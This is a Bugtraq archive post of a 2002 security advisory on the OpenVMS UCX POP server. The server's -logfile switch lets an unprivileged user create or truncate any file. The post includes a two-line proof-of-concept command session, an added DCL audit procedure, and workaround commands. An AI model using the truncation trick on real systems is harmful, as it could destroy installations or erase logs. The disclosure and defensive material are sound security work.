Bugtraq mailing list archives

OpenVMS POP server local vulnerability


From: "Mike Riley" <mike () akitanet co uk>
Date: Fri, 27 Sep 2002 13:26:10 +0100

Akita Security Advisory 27/09/2002
OpenVMS UCX$POP_SERVER.EXE vulnerability

Advisory:
http://www.akita-security.co.uk/VMS/ucx_pop_server.txt

VMS security tool
http://www.akita-security.co.uk/stoat


Overview
========

UCX is the main TCP/IP stack for OpenVMS.  Akita Security have
discovered a vulnerability in every version of the UCX POP
server which allows a local, unprivileged user to create, or
truncate to zero bytes, any file on the system, regardless of
that file's protection.

Due to the popularity of UCX this problem will be widespread
amongst OpenVMS installations.

This issue was discovered as part of wider research into OpenVMS
security.  Many issues have been found, and further advisories
will be released shortly.

Detail
======

The UCX POP server binary, SYS$SYSTEM:UCX$POP_SERVER.EXE, is
installed as a known image with the VMS privileges BYPASS and SYSPRV:

INSTALL> list ucx$pop_server.exe /full

DISK$OPENVMS071:<SYS0.SYSCOMMON.SYSEXE>.EXE
   UCX$POP_SERVER;1               Prv
        Entry access count         = 1
        Privileges = SYSPRV BYPASS

INSTALL>

The BYPASS privilege allows the POP server to override file system
protection entirely, and because the image is installed with that
privilege, any user who can activate it runs it with BYPASS in
effect.  The server accepts a -logfile command-line switch naming
the file it should write its log to, and it opens that file before
doing anything else.  An ordinary user can therefore point it at any
file specification: a non-existent file is created (owned by
SYSTEM), and an existing one is truncated, as follows:

____________________________________________________________________

$ show process/privs

25-SEP-2002 10:47:35.02   User: MIKE             Process ID:   0000013F
                          Node: VAX              Process name: "_TNA21:_1"

Authorized privileges:
 NETMBX    TMPMBX

Process privileges:
 NETMBX               may create network device
 TMPMBX               may create temporary mailbox

Process rights:
 INTERACTIVE
 REMOTE

System rights:
 SYS$NODE_VAX
$
$ break_it :== $sys$system:ucx$pop_server.exe
$ break_it -logfile sys$system:I_SHOULDNT_BE_ABLE_TO_WRITE_HERE
19102-09-24 17:41:39 sizeof(block_wait_times) 160
19102-09-24 17:41:40 sizeof(struct vms_time_rec) 32
19102-09-24 17:41:40 num_elems 5
[SNIP]
^C
$ dir/prot sys$system:I_*

Directory SYS$SYSROOT:[SYSEXE]

I_SHOULDNT_BE_ABLE_TO_WRITE_HERE.;1
                   insufficient privilege or object protection violation

Total of 1 file.
$
____________________________________________________________________

The file created looks like this:
____________________________________________________________________

Directory SYS$SYSROOT:[SYSEXE]

I_SHOULDNT_BE_ABLE_TO_WRITE_HERE.;1       File ID:  (9499,485,0)
Size:            0/0          Owner:    [SYSTEM]
Created:   24-SEP-2002 17:41:41.14
Revised:   24-SEP-2002 17:41:57.09 (1)
Expires:   <None specified>
Backup:    <No backup recorded>
Effective: <None specified>
Recording: <None specified>
File organization:  Sequential
Shelved state:      Online
File attributes:    Allocation: 0, Extend: 0, Global buffer count: 0
                    No version limit
Record format:      Stream_LF, maximum 0 bytes, longest 32767 bytes
Record attributes:  Carriage return carriage control
RMS attributes:     None
Journaling enabled: None
File protection:    System:RWED, Owner:RWED, Group:RE, World:
Access Cntrl List:  None

Total of 1 file, 0/0 blocks.
$
____________________________________________________________________
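The same pattern (a world-executable known image installed with a file
system override privilege, taking an attacker-controlled output path)
can exist in other installed images.  The following DCL command
procedure is an added example, not part of the advisory, for
enumerating candidates on a system you administer.  It relies only on
the standard INSTALL LIST/FULL output format shown above and on the
SEARCH utility; the privilege names to look for and the file name of
the procedure are the author's choice here, not something from the
advisory.

```dcl
$ ! AUDIT_INSTALLED_PRIVS.COM  (added example; not from the advisory)
$ !
$ ! Step 1: list every installed (known) image whose privilege set
$ ! includes a privilege that overrides file protection.  INSTALL
$ ! prints the image name a few lines above its "Privileges =" line,
$ ! so /WINDOW=(3,0) shows the three preceding lines with each match.
$ ! SYS$PIPE is the read end of the pipeline inside a PIPE command.
$ SET NOON
$ PIPE INSTALL LIST/FULL | SEARCH SYS$PIPE "BYPASS","SYSPRV","READALL","CMKRNL" /WINDOW=(3,0) /MATCH=OR
$ !
$ ! Step 2: for each image reported, check whether World has Execute
$ ! access.  Only world-executable privileged images can be activated
$ ! by an ordinary user.  Shown here for the image in this advisory;
$ ! repeat for every image reported in step 1.
$ DIRECTORY/SECURITY SYS$SYSTEM:UCX$POP_SERVER.EXE
$ EXIT
```

An image reported in step 1 that is also world-executable deserves the
same review the POP server gets in this advisory: does it accept any
switch, logical name or input that names a file it will create, open
for write or truncate while the privilege is in effect?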

Severity
========

At the least, this bug could be used by a local user to destroy an
OpenVMS installation by truncating system files, or to truncate
log files and so cover other activity.  If a local user could
control the log output of the POP server, it could probably be used
to gain full privileges, although this is speculation on our part.


Workaround
==========

Remove world execute permission from the POP server binary, so that
only the account the server runs under can activate the privileged
image.
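The workaround as DCL commands, added here as an example and not taken
from the advisory.  Denying World all access (a category listed with no
access codes) removes Execute along with everything else; the final
DIRECTORY/SECURITY confirms the new protection mask.  Before relying on
this, confirm that the account the POP server is started under still
has access to the image through the Owner or Group field or an ACL, and
that the service still starts, otherwise the workaround is also a denial
of service.

```dcl
$ ! Workaround from the advisory, as an added example (not from the advisory)
$ ! Deny World all access to the privileged image ...
$ SET SECURITY/PROTECTION=(WORLD) SYS$SYSTEM:UCX$POP_SERVER.EXE
$ ! ... and confirm that the World field of the protection mask is now empty.
$ DIRECTORY/SECURITY SYS$SYSTEM:UCX$POP_SERVER.EXE
```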

Vendor status
=============

Akita Security informed Compaq of this vulnerability on 14/06/2002.
Compaq have released an ECO which corrects the problem:
____________________________________________________________________

ECO B 1-JUL-2002 Alpha and VAX

Problem:

Disable the "-logfile" command line switch, which is not needed on
OpenVMS.

Deliverables:

TCPIP$POP_SERVER.EXE V5.3-18B

Reference:

Internal testing.
____________________________________________________________________

Please note the lack of reference to a security problem, and the
lack of credit to Akita Security.  Internal testing?

Credit
======

This issue was discovered by mike () akita co uk



--
Mike Riley - Security Systems manager @ Akita
http://www.akita-security.co.uk
--------------------------------------------------------------------
Sales: T:+44(0)1869 320111 F: +44(0)1869250688 E: sales () akita co uk
Tech: T: +44(0)1869 320111 E: mike () akita co uk
--------------------------------------------------------------------
"Security, performance, cost - pick two"